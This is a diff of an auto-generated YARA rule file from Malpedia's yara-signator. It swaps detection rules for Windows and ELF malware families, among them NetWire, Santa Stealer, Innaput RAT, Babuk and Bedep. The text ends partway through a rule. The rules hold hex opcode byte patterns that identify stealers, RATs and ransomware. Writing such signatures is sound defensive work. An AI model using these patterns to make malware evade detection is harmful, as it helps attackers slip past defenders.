 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4c6c1b9e-4647-5918-893c-d13ce0b5fa25"
+		id = "664ed877-3f83-5f6a-92fa-e1c35cd0edbd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.targetcompany"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.targetcompany_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.enfal_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "47a23feab60239622d1061098dd7caa46d2a81895190e3a3f7d203abbeea4b5b"
+		logic_hash = "872fbd5343bee5c1e22067a7277b79e519c2acefc43b08d0086dc684465dbd92"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83824,32 +83819,32 @@ rule MALPEDIA_Win_Targetcompany_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8955f4 e8???????? ff75b4 8bf8 53 }
-		$sequence_1 = { e8???????? 8d45b0 50 8d85c0feffff 50 8d8d10ffffff e8???????? }
-		$sequence_2 = { 8bcf 83f808 7207 8b17 89550c eb03 897d0c }
-		$sequence_3 = { 57 6a0f 5a 8bce 8d45e0 e8???????? }
-		$sequence_4 = { 50 ff15???????? be08000100 56 8944242c 8d842430450000 53 }
-		$sequence_5 = { 53 895db0 8955b4 e8???????? ff75b4 8906 8b4708 }
-		$sequence_6 = { 0f85a0000000 56 50 68???????? e8???????? 83c40c 83bdbcfeffff20 }
-		$sequence_7 = { 8945c0 8b75c0 8d7d9c a5 }
-		$sequence_8 = { ab ab 53 53 ab 8b442424 6801200000 }
-		$sequence_9 = { 83fe50 72d0 8db564ffffff e8???????? }
+		$sequence_0 = { e8???????? 8d8648020000 68???????? 50 }
+		$sequence_1 = { bffe010000 eb05 bff4010000 8bc7 5e eb02 }
+		$sequence_2 = { 51 8d8de8fcffff 51 53 ff505c 85c0 }
+		$sequence_3 = { 8d85b4fdffff 68???????? 50 e8???????? 8d85b4fdffff 57 }
+		$sequence_4 = { 8bec 81eccc040000 53 56 8b35???????? 57 }
+		$sequence_5 = { 89430c ffd6 8b4b1c 68???????? 57 }
+		$sequence_6 = { 50 e8???????? 8d8628020000 68???????? }
+		$sequence_7 = { 0fb645da 8d0480 8dbc0059020000 eb54 8b8548ffffff }
+		$sequence_8 = { 6a01 57 ff15???????? 8bf0 85f6 0f848e000000 8b4624 }
+		$sequence_9 = { 57 8901 ffd6 8b4b1c 68???????? 57 }
 
 	condition:
-		7 of them and filesize < 328704
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Netwire_Auto : FILE
+rule MALPEDIA_Win_Gcleaner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4555ab85-e4c7-54f3-be4b-3e67ab290352"
+		id = "db79045a-62be-5422-a484-4f1494402bb2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netwire_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gcleaner_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "10b18e0d62127105687ce75fd82795cf02980d2ae8e7158e6a2316037cb7d8e4"
+		logic_hash = "87e8c0680ea583ebecdec70190c315f1a40f9206262d6c132334f2c61dd046c1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83863,34 +83858,34 @@ rule MALPEDIA_Win_Netwire_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744241000000000 c744240c00000000 c744240800000000 c744240400000000 c7042410000000 }
-		$sequence_1 = { c744242c00000000 c744242800000000 c744242400000000 c7442420fdffffff }
-		$sequence_2 = { e8???????? c7042410000000 e8???????? 84c0 }
-		$sequence_3 = { e8???????? c7042446000000 e8???????? c7042449000000 e8???????? c7042446000000 e8???????? }
-		$sequence_4 = { c70424???????? e8???????? a3???????? e9???????? c705????????00000000 e9???????? c7042410020000 }
-		$sequence_5 = { e8???????? c7442410000000f0 c744240c01000000 c744240800000000 c744240400000000 c70424???????? }
-		$sequence_6 = { 83ec0c c7442408???????? c7442404???????? c70424???????? }
-		$sequence_7 = { 740c c7042400000000 e8???????? c70424???????? e8???????? }
-		$sequence_8 = { c70424???????? e8???????? a3???????? e9???????? c705????????00000000 e9???????? }
-		$sequence_9 = { e8???????? c7042401000000 e8???????? 84c0 }
+		$sequence_0 = { 50 6a04 8d85f0feffff 50 56 ff15???????? 85c0 }
+		$sequence_1 = { 5e c9 c3 53 ff7518 }
+		$sequence_2 = { 8035????????2e 8035????????2e 8035????????2e 8035????????2e 8035????????2e }
+		$sequence_3 = { 8bf8 83c40c 83ffff 743b 3bf7 }
+		$sequence_4 = { 57 8bd0 c645fc03 8d4dc0 }
+		$sequence_5 = { 7505 c60600 ebe9 837d1000 7518 }
+		$sequence_6 = { 8bd0 c645fc02 8d4da8 e8???????? 57 8bd0 }
+		$sequence_7 = { 8bd0 c645fc04 8d4dd8 e8???????? 83c410 8d4dc0 }
+		$sequence_8 = { 50 660fd685f8feffff e8???????? 83c40c 56 }
+		$sequence_9 = { ebe9 837d1000 7518 c60600 e8???????? }
 
 	condition:
-		7 of them and filesize < 416768
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Squidloader_Auto : FILE
+rule MALPEDIA_Win_Compfun_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7aae3b25-945a-5fb1-9acc-809b1e90e6e6"
+		id = "c3d00d25-914d-52b8-aa23-a416041c458d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.squidloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.squidloader_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.compfun"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.compfun_auto.yar#L1-L160"
 		license_url = "N/A"
-		logic_hash = "a855ddb0a2fda3c6498fbc6ae734c571ea8f3a4a311f9d9ebae8f8d336ad0dd5"
-		score = 60
-		quality = 55
+		logic_hash = "8284624d97f6e1919129028ed727636c96197862138001108f45d962bbade24e"
+		score = 75
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -83902,71 +83897,77 @@ rule MALPEDIA_Win_Squidloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f114c2440 0f114c2450 0f114c2460 0f114c2470 }
-		$sequence_1 = { 5f 5e c3 4053 4883ec30 488bd9 8b4934 }
-		$sequence_2 = { c3 4053 4883ec30 488bd9 8b4934 83e902 }
-		$sequence_3 = { 57 4881ec90000000 488b05???????? 4833c4 4889842480000000 488bda 488bf9 }
-		$sequence_4 = { 5e c3 4053 4883ec30 488bd9 8b4934 }
-		$sequence_5 = { c3 4053 4883ec30 488bd9 8b4934 83e902 746a }
-		$sequence_6 = { c3 4053 4883ec30 488bd9 8b4934 }
-		$sequence_7 = { 5e c3 4053 4883ec30 488bd9 8b4934 83e902 }
-		$sequence_8 = { ffd3 48837c242800 0f84ae000000 b8ffffffff f00fc105???????? 85c0 7f0c }
-		$sequence_9 = { e8???????? f30f108424a0010000 f30f108c24a4010000 e8???????? f20f108c2420010000 0f16d1 0fc6c000 }
+		$sequence_0 = { 6a00 56 e8???????? 83c40c c7460c57202020 c70652656745 c746046e756d4b }
+		$sequence_1 = { c7460475705072 c746086976696c c7460c65676556 c74610616c7565 c6461500 8bc6 5e }
+		$sequence_2 = { c7460c62757465 c6461200 8bc6 5e 5d }
+		$sequence_3 = { 742d 53 8d85d8fdffff 50 a1???????? }
+		$sequence_4 = { c746144533442d c7461843343537 c7461c39323931 c7462036393245 c6462500 }
+		$sequence_5 = { e8???????? 59 50 57 ffd3 894650 85c0 }
+		$sequence_6 = { 83c40c c746086c655720 c70643726561 c7460474654669 }
+		$sequence_7 = { e8???????? 83c40c c706466c7573 c746046846696c c7460865427566 c7460c66657273 }
+		$sequence_8 = { 488b8424a0000000 ff5030 85c0 7508 }
+		$sequence_9 = { 837c2428ff 740a c744244401000000 eb08 }
+		$sequence_10 = { 488b842438010000 8908 488b842438010000 8b08 }
+		$sequence_11 = { ff15???????? 4c8bd8 488b442460 4c895848 }
+		$sequence_12 = { 8b9424a4000000 488b8c2498000000 488b442438 420fb60400 }
+		$sequence_13 = { 488b442420 48890424 488b0424 c70073766368 }
+		$sequence_14 = { 483904d1 750a 8b442438 89442420 }
+		$sequence_15 = { 488b442450 0fb600 3de9000000 740f }
 
 	condition:
-		7 of them and filesize < 18701312
+		7 of them and filesize < 402432
 }
-rule MALPEDIA_Win_Kazuar_Auto : FILE
+rule MALPEDIA_Elf_Babuk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ccff8922-162c-572c-8893-65e66a285e05"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kazuar_auto.yar#L1-L124"
+		id = "8eba83d0-6c95-5d1f-85db-3750f26fdff6"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.babuk_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "e795bcf133e170c8cc0011c1658f28fb0b95178f81911116117a7619cede54b7"
+		logic_hash = "a4e1d4252d61243f852bbd89e2ebf51566a3485791e9905d978089b8c49c4cb9"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7452 83b98c00000000 7449 4c01de 31db 8b6e20 448b6618 }
-		$sequence_1 = { 83c002 c744240400000000 668945f2 8d45ec c7042400000000 8944240c 8d45f0 }
-		$sequence_2 = { e8???????? 89c3 e8???????? 01c0 895df4 }
-		$sequence_3 = { 31c0 4885c9 4989cb 89d7 7463 4863493c }
-		$sequence_4 = { 8b0402 4c01d8 eb07 48ffc3 ebc8 31c0 }
-		$sequence_5 = { 8d8b00030000 894c2408 8d4b08 894c2404 ff522c 83ec18 }
-		$sequence_6 = { 6685c9 7417 e8???????? 0fb7c0 41ffc1 }
-		$sequence_7 = { 31c0 4885db 7428 4989db 498b4b40 e8???????? 3d88ae6393 }
-		$sequence_8 = { 7425 e8???????? 39f8 751c 8b4624 4801db }
-		$sequence_9 = { 8d8b00030000 894c2408 8d4b08 894c2404 ff522c }
+		$sequence_0 = { 658b0d00000000 8b89fcffffff 3b6108 7678 83ec14 8b442418 8b4c241c }
+		$sequence_1 = { 8b4c2438 890f 8b542444 89570c 8b1d???????? 85db }
+		$sequence_2 = { e8???????? 8b44240c 89442410 8b4c2418 890c24 e8???????? 8b442420 }
+		$sequence_3 = { e8???????? 8b442438 8b4804 90 8b492c 894c2420 e8???????? }
+		$sequence_4 = { c3 658b1d00000000 8b9bfcffffff 8b5b18 8b5b70 8403 890424 }
+		$sequence_5 = { 01d9 8b9c24a8010000 8bbc243c030000 01fb 11cd 8b8c248c010000 8b9c2464020000 }
+		$sequence_6 = { 8b44244c 8b4c2440 31d2 eb06 8d5101 90 89f1 }
+		$sequence_7 = { 895328 8b9424b0000000 8b8c2490000000 01ca 33562c 89532c }
+		$sequence_8 = { 8b5a40 39d8 0f85360f0000 89bc2408020000 81c4dc010000 c3 89c7 }
+		$sequence_9 = { 8b4c2424 01ca 89942444050000 8b8c2490050000 c1e11a 898c2420050000 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 4186112
 }
-rule MALPEDIA_Win_Santa_Stealer_Auto : FILE
+rule MALPEDIA_Win_Attor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "698b58d7-3beb-5b12-b9ab-ea8db82a9446"
+		id = "9165df3a-0588-5937-bb39-c85fa6fb26bb"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.santa_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.santa_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.attor_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "0ee975510b7aa8f6c88f59ccf7386a44e723fcc4879e58b69b100521065bb285"
+		logic_hash = "0c87726814bf53a9906b73b9a1468bc9095c79fe1e564f252fa0222653b1264a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -83980,34 +83981,40 @@ rule MALPEDIA_Win_Santa_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 488d5640 4c89e1 44896c2458 4c897c2460 e8???????? 89c3 }
-		$sequence_1 = { 6644894114 488b4918 41c7422407000000 80796700 75b3 80796800 75ad }
-		$sequence_2 = { c744246cffffffff 488b01 4885c0 7464 4c8d44246c ba0a000000 ff5050 }
-		$sequence_3 = { e8???????? 89c7 85c0 0f8504f9ffff 8b4334 c7436801000000 4429e0 }
-		$sequence_4 = { e8???????? 89c3 85c0 0f84fc000000 31db 662e0f1f840000000000 4c89e2 }
-		$sequence_5 = { 7371 418b4120 85c0 755f 4881faffffff3f 7768 4883ec38 }
-		$sequence_6 = { c6431770 488d15d8461100 480f44fa 4d85e4 b8011a0000 48896b08 488d15d040fbff }
-		$sequence_7 = { e8???????? 4d85ff 7475 440fb74760 410fbf4e36 4139c8 7c66 }
-		$sequence_8 = { f77134 8d5001 4439fa 0f84b0010000 4531c9 4c8d442448 4489fa }
-		$sequence_9 = { e8???????? 4829c4 488b4548 4885c9 742d 4989ca 4883796800 }
+		$sequence_0 = { 83f801 7411 3d81000000 740a }
+		$sequence_1 = { 488bea 4c8be1 4889742440 4885c9 }
+		$sequence_2 = { 0f84aa000000 4885d2 0f84a1000000 48895c2448 488d5a08 }
+		$sequence_3 = { 498bcd e8???????? 4c8b6c2448 4d85e4 }
+		$sequence_4 = { 48896810 488970e0 488978d8 33db 4c8970d0 4532e4 33f6 }
+		$sequence_5 = { 4885c9 7427 488b842490000000 48899c2490000000 }
+		$sequence_6 = { 4889442430 e8???????? 48399c2480000000 0f84ef000000 }
+		$sequence_7 = { 4c8b6c2448 4d85e4 740f 33c9 e8???????? }
+		$sequence_8 = { 83c404 83e103 f3aa 8b442414 85c0 }
+		$sequence_9 = { 8bcf 8b7c2414 8bd1 33c0 c1e902 }
+		$sequence_10 = { 740a 83f808 7405 83f811 }
+		$sequence_11 = { 33ff 3bf7 c644241300 897c2418 897c241c 897c2414 0f8423010000 }
+		$sequence_12 = { ff15???????? 89442420 8d442414 8d4c2420 50 51 }
+		$sequence_13 = { 7411 6a00 e8???????? 56 ff15???????? 83c408 8b442430 }
+		$sequence_14 = { 57 ffd6 83c408 8b7c2428 85ff 740d }
+		$sequence_15 = { e8???????? 83c40c 3bc7 8944241c 0f84f3000000 }
 
 	condition:
-		7 of them and filesize < 27009024
+		7 of them and filesize < 2023424
 }
-rule MALPEDIA_Win_Unidentified_108_Auto : FILE
+rule MALPEDIA_Win_Colony_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "523cac0e-068e-567f-9b67-256b819ee9a9"
+		id = "6de8851a-b1ef-561a-a63a-12519dea8778"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_108_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.colony_auto.yar#L1-L230"
 		license_url = "N/A"
-		logic_hash = "ff49cd548bd3e2342145a6556aab556577d4c1ad014ed5644df8b6ae901a1a52"
+		logic_hash = "2b20de5492a48cc7fc726969d55d094c8002372f30c4bd6a4f1592aca3fb7fc0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -84019,32 +84026,46 @@ rule MALPEDIA_Win_Unidentified_108_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4c8d05a21d0100 488bf9 488d15a01d0100 b904000000 e8???????? 8bd3 }
-		$sequence_1 = { 48c1fe06 4c8d2d0a5b0100 83e03f 4c8d24c0 498b44f500 }
-		$sequence_2 = { 488d15e7f30000 83e03f 4d8bfd 49c1ff06 41b90a000000 488d3cc0 }
-		$sequence_3 = { 742e 488d5510 0f1f840000000000 803201 }
-		$sequence_4 = { 8b0d???????? 458bc5 f20f1005???????? 488bf8 }
-		$sequence_5 = { 488d5201 41ffc0 488d4520 498bcc }
-		$sequence_6 = { 4c8d15e0f40000 83e03f 498bd5 48c1fa06 }
-		$sequence_7 = { 736e 488bc3 488bf3 48c1fe06 4c8d2d4ef70000 83e03f }
-		$sequence_8 = { 486bc000 488d0d5ed50100 8b542430 48891401 488d0dd7250100 e8???????? }
-		$sequence_9 = { 48894dff 83e03f 458be9 488d0dd066ffff 4c8945e7 }
+		$sequence_0 = { 740f 0301 eb0b a801 }
+		$sequence_1 = { 32c0 8be5 5d c3 807d0800 56 57 }
+		$sequence_2 = { 8b4224 2b4220 660f6ec0 f30fe6c0 }
+		$sequence_3 = { 8b421c 2b4218 660f6ec0 f30fe6c0 }
+		$sequence_4 = { 8a4203 8841fe 8a4202 8841ff 8b02 c1e808 8801 }
+		$sequence_5 = { 334f14 8b45f4 894dfc 8bca c1e910 81e1ff000000 c1e808 }
+		$sequence_6 = { 69d200008f04 2bc8 c1e910 69c161a4f778 2bd0 }
+		$sequence_7 = { 7407 b901000000 eb0a 33c9 803f01 0f95c1 33c0 }
+		$sequence_8 = { 0fbed9 83eb30 eb13 8ac1 }
+		$sequence_9 = { 0f85bd000000 807dda01 751f 66a1???????? }
+		$sequence_10 = { 0f85bc000000 f30f7e05???????? 660fd606 a0???????? }
+		$sequence_11 = { 0f855b010000 8d7830 c7403c00000000 8d4838 eb0d 8d7824 }
+		$sequence_12 = { 8b00 83f801 7e5c f7420400080000 }
+		$sequence_13 = { 0f8fc9010000 0f84ad010000 3d09280000 0f8ff1000000 }
+		$sequence_14 = { 8b4214 2b4210 660f6ec0 f30fe6c0 }
+		$sequence_15 = { 0101 0101 0202 0202 0200 0102 0202 }
+		$sequence_16 = { 483305???????? 488bcb 488905???????? ff15???????? 488d15a9980000 }
+		$sequence_17 = { e9???????? 4c8d357e0c0100 488b0d???????? eb7b 4c8d35660c0100 }
+		$sequence_18 = { 48393d???????? 448bf0 0f85f8000000 488d0d687b0000 33d2 41b800080000 }
+		$sequence_19 = { e8???????? 488d15a3a50000 488d0d94a50000 e8???????? }
+		$sequence_20 = { 488bd7 488bcf 48c1f905 83e21f 4c8d05f8c70000 498b0cc8 486bd258 }
+		$sequence_21 = { 7519 4c8d05f3900000 8bd7 498bce }
+		$sequence_22 = { b91e000000 e8???????? b9ff000000 e8???????? 4803db 4c8d3590fc0000 }
+		$sequence_23 = { 488bc8 ff15???????? 488d15147b0000 488bcb 488905???????? }
 
 	condition:
-		7 of them and filesize < 307200
+		7 of them and filesize < 7599104
 }
-rule MALPEDIA_Win_Makadocs_Auto : FILE
+rule MALPEDIA_Win_Ramdo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3783cfc0-154b-51b0-b2f8-112def4fc579"
+		id = "e5dab1d9-452a-5887-a4af-58f6481f5f6c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.makadocs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.makadocs_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ramdo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ramdo_auto.yar#L1-L105"
 		license_url = "N/A"
-		logic_hash = "bc62432004ad887b8979c87f3801ee7c6c80fe20ba6026d285a25c1d6c33524c"
+		logic_hash = "8755ec08f63d4c02872dc91cf7ac7496e98fc865f5e95d3244691dbde1a5dad8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84058,32 +84079,32 @@ rule MALPEDIA_Win_Makadocs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 83c414 8d5c2414 c644243008 e8???????? c644243003 }
-		$sequence_1 = { 750d 8d460c 55 e8???????? 84c0 7436 8b4c242c }
-		$sequence_2 = { c644242c07 8b442434 51 83c0f0 89642420 8bf4 e8???????? }
-		$sequence_3 = { eb12 8b442420 8b4804 51 ff15???????? }
-		$sequence_4 = { 8b00 83c404 50 e8???????? 8b9548ffffff 894250 8b8554ffffff }
-		$sequence_5 = { 85f6 0f8c09020000 3bf1 0f8f01020000 03c6 }
-		$sequence_6 = { 8d5c2410 c64424300c e8???????? b303 885c2430 8b44241c }
-		$sequence_7 = { 50 b9???????? e8???????? 8d4c2420 51 8d4c2450 c68424a80000002d }
-		$sequence_8 = { 8d4c2440 e8???????? 8d542444 68???????? b314 }
-		$sequence_9 = { 83c404 56 8944241c ff15???????? }
+		$sequence_0 = { e8???????? 68b3030442 6a00 6a00 e8???????? }
+		$sequence_1 = { 68bc882a42 6a03 6a00 e8???????? }
+		$sequence_2 = { 6894dac0dc 6a00 6a00 e8???????? }
+		$sequence_3 = { ff55f8 8945fc 837dfcff 7411 }
+		$sequence_4 = { 68dd786eac 6a03 6a00 e8???????? }
+		$sequence_5 = { 68c07b3072 6a03 6a00 e8???????? }
+		$sequence_6 = { 68b6b2cff5 6a03 6a00 e8???????? }
+		$sequence_7 = { 68b928ece1 6a03 6a00 e8???????? }
+		$sequence_8 = { 68b900308a 6a01 6a00 e8???????? }
+		$sequence_9 = { 68c29e34ea 6a03 6a00 e8???????? }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Innaput_Rat_Auto : FILE
+rule MALPEDIA_Win_Unidentified_042_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d86d59ae-6efa-5db2-8e1b-5b4757eca710"
+		id = "ae890a66-8da7-5772-a89f-ab1d2760fae8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.innaput_rat_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_042_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9400019d5ff97dc8155c2ec12b684baeeb0d9d8ecccb4529f4b2a8b8f06ad889"
+		logic_hash = "782ff3cf4462e323a29ec1ed58b2c131a4c6b0f31ed36cc79b62c6515d0facd2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84097,32 +84118,32 @@ rule MALPEDIA_Win_Innaput_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffb720060000 8d8f1c060000 51 ffb718060000 }
-		$sequence_1 = { 85c0 7427 ffb720060000 8d8f1c060000 51 }
-		$sequence_2 = { 8bf8 33c0 893b ab }
-		$sequence_3 = { ff15???????? ffb718060000 ff15???????? 85c0 750c ffb71c060000 ff15???????? }
-		$sequence_4 = { ff15???????? 85c0 750c ffb71c060000 ff15???????? 57 e8???????? }
-		$sequence_5 = { 59 8bc6 3bf3 75ed }
-		$sequence_6 = { 751b 53 53 53 }
-		$sequence_7 = { ff15???????? 85c0 750c ffb71c060000 ff15???????? }
-		$sequence_8 = { 85c0 7413 3bc6 740f 8b4d08 e8???????? 3b450c }
-		$sequence_9 = { 2bf1 8a08 884c0616 40 84c9 75f5 }
+		$sequence_0 = { 56 8bf0 8b4508 8b00 57 8bf9 c70600000000 }
+		$sequence_1 = { 53 8bd8 56 b800200000 33f6 66858350020000 7410 }
+		$sequence_2 = { 8a1430 40 8855ff 33d2 8d7801 33c9 8955f4 }
+		$sequence_3 = { 66858f50020000 0f8532ffffff c60616 8a977e010000 885601 8a877f010000 884602 }
+		$sequence_4 = { 53 56 8bf0 a1???????? 33db 57 895df8 }
+		$sequence_5 = { 895df4 8d75e8 e8???????? 8bc7 5f 5e }
+		$sequence_6 = { 57 ffd6 a3???????? 85c0 0f8489020000 8d95d7fcffff 52 }
+		$sequence_7 = { c78518f9ffff356c656e c7851cf9ffff636a5a44 c78520f9ffff49577a32 c78524f9ffff59725a56 c78528f9ffff4362620d c7852cf9ffff0a626671 c78530f9ffff73752f38 }
+		$sequence_8 = { 0175f0 c1cf02 89b5ccfeffff 89bdd4feffff 8bfa }
+		$sequence_9 = { 88480a 66859350020000 7548 8b7b18 8d700b 6a41 8bce }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 516096
 }
-rule MALPEDIA_Win_Mbrlock_Auto : FILE
+rule MALPEDIA_Win_Bedep_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "278f7834-90b2-5397-9ece-a797760d8d62"
+		id = "6ea06871-a8ca-5ce7-b9c2-106c128847d6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mbrlock_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bedep_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "f922ef8df18c5fa1824f3d97da8882716cabf76bff393f438d1827b2c64b4a0e"
+		logic_hash = "16b76a62133391f06cc2c61f0e60ca33efb0a31528884eb23ddb66df3319299d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -84136,34 +84157,34 @@ rule MALPEDIA_Win_Mbrlock_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 663d0500 7445 668bce 668bd0 66c1e90a 66c1ea0a }
-		$sequence_1 = { 8965f0 8b4708 8975ec 85c0 c745fc00000000 7422 50 }
-		$sequence_2 = { e8???????? 8d4d8c c745fcffffffff e8???????? b801000000 8b4df4 64890d00000000 }
-		$sequence_3 = { 6685d2 740c 33c9 663bf0 0f94c1 }
-		$sequence_4 = { 85f6 7407 8d4608 85c0 7517 8d442410 }
-		$sequence_5 = { 6a00 52 57 50 ff5624 8bf8 85ff }
-		$sequence_6 = { 83c410 8b45ec 8d4e24 50 53 }
-		$sequence_7 = { c744242044764a00 8d4c2420 6a01 8d542444 51 52 8bce }
-		$sequence_8 = { 5b 0f94c0 81c480010000 c3 5f 5e 33c0 }
-		$sequence_9 = { 7409 53 e8???????? 83c404 68010100a0 6a00 }
+		$sequence_0 = { 6a02 5f 397df0 7e03 895dfc 837d0800 741f }
